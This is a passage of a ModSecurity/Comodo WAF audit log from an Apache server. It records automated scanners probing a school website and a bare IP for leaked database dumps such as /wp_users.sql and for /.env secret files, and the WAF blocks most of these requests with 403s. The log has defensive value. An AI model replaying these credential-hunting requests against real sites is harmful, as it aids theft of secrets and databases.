URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".wp.sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747179961351661 2142 (- - -) Stopwatch2: 1747179961351661 2142; combined=805, p1=419, p2=360, p3=0, p4=0, p5=26, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a0eae474-Z-- --0c8b114e-A-- [14/May/2025:06:46:01 +0700] aCPZuTMGvM3GPb0-SyRVogAAAEY 103.236.140.4 35660 103.236.140.4 8181 --0c8b114e-B-- GET /usr.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.220.101.12 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.220.101.12 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Mobile Safari/537.36 Accept: */* --0c8b114e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0c8b114e-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747179961989025 2058 (- - -) Stopwatch2: 1747179961989025 2058; combined=706, p1=373, p2=312, p3=0, p4=0, p5=21, sr=54, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0c8b114e-Z-- --389ef870-A-- [14/May/2025:06:46:02 +0700] aCPZusOlTOX2TmGW6__24gAAAMI 103.236.140.4 35696 103.236.140.4 8181 --389ef870-B-- GET /wp_users.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.220.101.12 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.220.101.12 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Mobile Safari/537.36 Accept: */* --389ef870-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --389ef870-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747179962846599 1953 (- - -) Stopwatch2: 1747179962846599 1953; combined=770, p1=371, p2=371, p3=0, p4=0, p5=28, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --389ef870-Z-- --89193356-A-- [14/May/2025:06:46:03 +0700] aCPZu8OlTOX2TmGW6__24wAAANI 103.236.140.4 35716 103.236.140.4 8181 --89193356-B-- GET /wp_user.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.220.101.12 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.220.101.12 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Mobile Safari/537.36 Accept: */* --89193356-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --89193356-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747179963335509 2155 (- - -) Stopwatch2: 1747179963335509 2155; combined=696, p1=339, p2=335, p3=0, p4=0, p5=22, sr=57, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --89193356-Z-- --82f69d19-A-- [14/May/2025:06:46:04 +0700] aCPZvDMGvM3GPb0-SyRVtAAAAEk 103.236.140.4 35758 103.236.140.4 8181 --82f69d19-B-- GET /wordpress1.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 192.42.116.196 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 192.42.116.196 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Mobile Safari/537.36 Accept: */* --82f69d19-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --82f69d19-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747179964382871 2061 (- - -) Stopwatch2: 1747179964382871 2061; combined=682, p1=326, p2=335, p3=0, p4=0, p5=21, sr=55, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --82f69d19-Z-- --4126c60d-A-- [14/May/2025:06:46:05 +0700] aCPZvcabX6K9rhby1vhScAAAAJQ 103.236.140.4 35808 103.236.140.4 8181 --4126c60d-B-- GET /blog.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 192.42.116.196 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 192.42.116.196 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Mobile Safari/537.36 Accept: */* --4126c60d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4126c60d-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747179965531076 2147 (- - -) Stopwatch2: 1747179965531076 2147; combined=966, p1=452, p2=482, p3=0, p4=0, p5=32, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4126c60d-Z-- --b1223360-A-- [14/May/2025:06:46:06 +0700] aCPZvl1ltXwOneQqchOzMAAAAAI 103.236.140.4 35842 103.236.140.4 8181 --b1223360-B-- GET /wp1.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 192.42.116.196 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 192.42.116.196 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Mobile Safari/537.36 Accept: */* --b1223360-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b1223360-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747179966296407 2217 (- - -) Stopwatch2: 1747179966296407 2217; combined=720, p1=344, p2=345, p3=0, p4=0, p5=30, sr=62, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b1223360-Z-- --8be4d80e-A-- [14/May/2025:07:22:21 +0700] aCPiPTMGvM3GPb0-SyR_DQAAAFc 103.236.140.4 36940 103.236.140.4 8181 --8be4d80e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.134.17 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.134.17 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --8be4d80e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8be4d80e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747182141391102 989 (- - -) Stopwatch2: 1747182141391102 989; combined=414, p1=368, p2=0, p3=0, p4=0, p5=46, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8be4d80e-Z-- --1b779d5f-A-- [14/May/2025:07:22:23 +0700] aCPiPzMGvM3GPb0-SyR_NgAAAEU 103.236.140.4 37050 103.236.140.4 8181 --1b779d5f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.134.17 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.134.17 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --1b779d5f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1b779d5f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747182143871655 798 (- - -) Stopwatch2: 1747182143871655 798; combined=325, p1=288, p2=0, p3=0, p4=0, p5=37, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1b779d5f-Z-- --d189101c-A-- [14/May/2025:09:19:37 +0700] aCP9uTMGvM3GPb0-SyT9MQAAAEY 103.236.140.4 35704 103.236.140.4 8181 --d189101c-B-- POST /dns-query HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 47.251.93.227 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 47.251.93.227 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --d189101c-C-- ð‡examplecom --d189101c-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --d189101c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1747189177745962 6034 (- - -) Stopwatch2: 1747189177745962 6034; combined=4442, p1=819, p2=3455, p3=54, p4=80, p5=34, sr=88, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d189101c-Z-- --0ab3300d-A-- [14/May/2025:09:19:38 +0700] aCP9usabX6K9rhby1vga_QAAAIo 103.236.140.4 35738 103.236.140.4 8181 --0ab3300d-B-- POST /dns-query HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 47.251.93.227 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 47.251.93.227 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --0ab3300d-C-- Þexamplecom --0ab3300d-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --0ab3300d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1747189178357620 4072 (- - -) Stopwatch2: 1747189178357620 4072; combined=2703, p1=877, p2=1732, p3=36, p4=31, p5=27, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0ab3300d-Z-- --bca0f617-A-- [14/May/2025:09:19:39 +0700] aCP9u8abX6K9rhby1vgbAgAAAIU 103.236.140.4 35784 103.236.140.4 8181 --bca0f617-B-- POST /query HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 47.251.93.227 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 47.251.93.227 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --bca0f617-C-- -ôexamplecom --bca0f617-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --bca0f617-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1747189179381805 3622 (- - -) Stopwatch2: 1747189179381805 3622; combined=2482, p1=564, p2=1832, p3=28, p4=32, p5=25, sr=69, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bca0f617-Z-- --3dd6a669-A-- [14/May/2025:09:19:40 +0700] aCP9vDMGvM3GPb0-SyT9PgAAAE0 103.236.140.4 35830 103.236.140.4 8181 --3dd6a669-B-- POST /query HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 47.251.93.227 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 47.251.93.227 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --3dd6a669-C-- Xexamplecom --3dd6a669-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --3dd6a669-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1747189180393737 3032 (- - -) Stopwatch2: 1747189180393737 3032; combined=2040, p1=424, p2=1543, p3=25, p4=28, p5=20, sr=51, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3dd6a669-Z-- --3b025402-A-- [14/May/2025:09:19:40 +0700] aCP9vDMGvM3GPb0-SyT9QgAAAEo 103.236.140.4 35858 103.236.140.4 8181 --3b025402-B-- POST /resolve HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 47.251.93.227 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 47.251.93.227 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --3b025402-C-- Øïexamplecom --3b025402-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --3b025402-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1747189180993729 3196 (- - -) Stopwatch2: 1747189180993729 3196; combined=2231, p1=453, p2=1702, p3=25, p4=30, p5=21, sr=57, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3b025402-Z-- --a40e4a45-A-- [14/May/2025:09:19:41 +0700] aCP9vV1ltXwOneQqchNOGQAAAAI 103.236.140.4 35886 103.236.140.4 8181 --a40e4a45-B-- POST /resolve HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 47.251.93.227 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 47.251.93.227 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --a40e4a45-C-- ˜Ìexamplecom --a40e4a45-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --a40e4a45-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1747189181604214 4559 (- - -) Stopwatch2: 1747189181604214 4559; combined=2983, p1=647, p2=2235, p3=32, p4=37, p5=32, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a40e4a45-Z-- --e025962e-A-- [14/May/2025:09:19:43 +0700] aCP9v8abX6K9rhby1vgbDgAAAIY 103.236.140.4 35952 103.236.140.4 8181 --e025962e-B-- POST / HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 47.251.93.227 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 47.251.93.227 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --e025962e-C-- }Ñexamplecom --e025962e-F-- HTTP/1.1 200 OK Last-Modified: Sat, 19 Aug 2023 08:21:22 GMT ETag: "13cd-6034254946480" Accept-Ranges: bytes Content-Length: 5069 Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html --e025962e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1747189183094049 3501 (- - -) Stopwatch2: 1747189183094049 3501; combined=2326, p1=478, p2=1751, p3=35, p4=32, p5=30, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e025962e-Z-- --f560bf6a-A-- [14/May/2025:09:19:44 +0700] aCP9wMOlTOX2TmGW6_-4eQAAAM0 103.236.140.4 36020 103.236.140.4 8181 --f560bf6a-B-- POST / HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 47.251.93.227 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 47.251.93.227 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --f560bf6a-C-- Ešexamplecom --f560bf6a-F-- HTTP/1.1 200 OK Last-Modified: Sat, 19 Aug 2023 08:21:22 GMT ETag: "13cd-6034254946480" Accept-Ranges: bytes Content-Length: 5069 Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html --f560bf6a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1747189184740958 4529 (- - -) Stopwatch2: 1747189184740958 4529; combined=3013, p1=688, p2=2202, p3=44, p4=43, p5=35, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f560bf6a-Z-- --b7ed0930-A-- [14/May/2025:11:32:05 +0700] aCQcxTMGvM3GPb0-SySkKwAAAFE 103.236.140.4 60702 103.236.140.4 8181 --b7ed0930-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 161.35.197.238 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 161.35.197.238 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --b7ed0930-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b7ed0930-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747197125835949 635 (- - -) Stopwatch2: 1747197125835949 635; combined=262, p1=234, p2=0, p3=0, p4=0, p5=28, sr=51, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b7ed0930-Z-- --c7e3d85c-A-- [14/May/2025:12:51:08 +0700] aCQvTMOlTOX2TmGW6__SfQAAAMM 103.236.140.4 51442 103.236.140.4 8181 --c7e3d85c-B-- GET /.env HTTP/1.0 Host: petruk.hauganslekt.no X-Real-IP: 207.154.197.113 X-Forwarded-Host: petruk.hauganslekt.no X-Forwarded-Server: petruk.hauganslekt.no X-Forwarded-For: 207.154.197.113 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --c7e3d85c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c7e3d85c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747201868450500 767 (- - -) Stopwatch2: 1747201868450500 767; combined=275, p1=240, p2=0, p3=0, p4=0, p5=35, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c7e3d85c-Z-- --9b59aa6a-A-- [14/May/2025:13:18:26 +0700] aCQ1sjMGvM3GPb0-SyQfagAAAEw 103.236.140.4 59682 103.236.140.4 8181 --9b59aa6a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.175 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.175 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 6.0; NCE-AL00 Build/HUAWEINCE-AL00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/66.0.3359.126 